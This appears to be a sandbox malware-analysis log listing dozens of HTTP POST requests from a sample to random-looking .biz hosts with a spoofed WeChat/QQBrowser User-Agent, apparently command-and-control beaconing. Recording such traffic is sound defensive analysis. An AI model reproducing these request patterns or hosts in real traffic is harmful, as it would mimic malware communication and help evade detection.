Source: global traffic HTTP traffic detected: POST /qbllddvxueecww HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /jaypbwnkuad HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /om HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /cnub HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /udqtfnpdyqh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /kacads HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /nuyubw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /rn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /enxhgeexxmda HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /pry HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /xrcr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /nr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /uku HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /sbnab HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /dvarulpg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /tfbvwglkixk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /noubyejh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xccjj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /cdrlubbsf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hehckyov.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /qmfujjy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /dxlhs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rynmcq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /rgkgvuyxljjatio HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ki HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uaafd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /bq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /vhecjxbkixjuljyp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: eufxebus.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /cgkctkdxtvumt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pwlqfu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /nmqrslobvguxfrkm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /esgffqvf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rrqafepng.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /eviqjrwjsc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /xyrpanl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ctdtgwag.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /aoayitmlcu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ceercoregt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tnevuluw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /xgyulldvremqd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /jhppqdqsxkpre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: whjovd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /xsnbcmvbhjayqro HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /myrpsocdgnp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /pm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /jntykoegrmymca HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /nwuwfpndyaon HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: reczwga.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /tpnlrogxe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bghjpy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /gqjcfeax HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: damcprvgv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /fxyeanegauuypg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /itmauuakdv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ocsvqjg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /cqrtypmijgihv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /xcccv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ywffr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /seopbnrlp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ecxbwt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /vuf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xccjj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /lqskha HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pectx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /k HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hehckyov.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /poufjqlcmnc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zyiexezl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /fwiohktfcqxxnbh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rynmcq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /fvf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: banwyw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /pdgkdbbj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /byhbnbikqcomemw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uaafd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /jubq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /xcnnbrtqgt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: eufxebus.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /qoerrcmhybkh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zrlssa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /fu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jlqltsjvh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /wnele HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pwlqfu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /lrxwrhp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xyrgy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
The POST requests below all carry the same header block: Cache-Control: no-cache, Connection: Keep-Alive, Pragma: no-cache, User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400. Only the request path, Host and Content-Length differ, so those are listed per request.
Source: global traffic HTTP traffic detected: POST /xb HTTP/1.1 Host: htwqzczce.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /xwfedwcvhvxkiha HTTP/1.1 Host: rrqafepng.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /mfixqgnsqv HTTP/1.1 Host: htwqzczce.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /fwv HTTP/1.1 Host: kvbjaur.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /frqpsrt HTTP/1.1 Host: uphca.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /p HTTP/1.1 Host: ctdtgwag.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /hljxfepxgpjush HTTP/1.1 Host: fjumtfnz.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /fiarjsoopiyhm HTTP/1.1 Host: tnevuluw.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /vwjckymhn HTTP/1.1 Host: hlzfuyy.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /hij HTTP/1.1 Host: whjovd.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /dpjyudy HTTP/1.1 Host: rffxu.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /hdokbthlu HTTP/1.1 Host: cikivjto.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /xllckl HTTP/1.1 Host: gjogvvpsf.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /nfbd HTTP/1.1 Host: qncdaagct.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /mr HTTP/1.1 Host: gjogvvpsf.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ldxvcwjydqq HTTP/1.1 Host: shpwbsrw.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /qlyttg HTTP/1.1 Host: reczwga.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /rbpibulhoasascdr HTTP/1.1 Host: bghjpy.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /aatcckarfifoo HTTP/1.1 Host: cjvgcl.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /nempu HTTP/1.1 Host: neazudmrq.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /agwyffystye HTTP/1.1 Host: damcprvgv.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /mgvdqejexijygsb HTTP/1.1 Host: pgfsvwx.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /cwhybsvpmfyx HTTP/1.1 Host: aatcwo.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /wiwimspu HTTP/1.1 Host: ocsvqjg.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /rwiyegsmnxbaierb HTTP/1.1 Host: ywffr.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /v HTTP/1.1 Host: kcyvxytog.biz Content-Length: 802
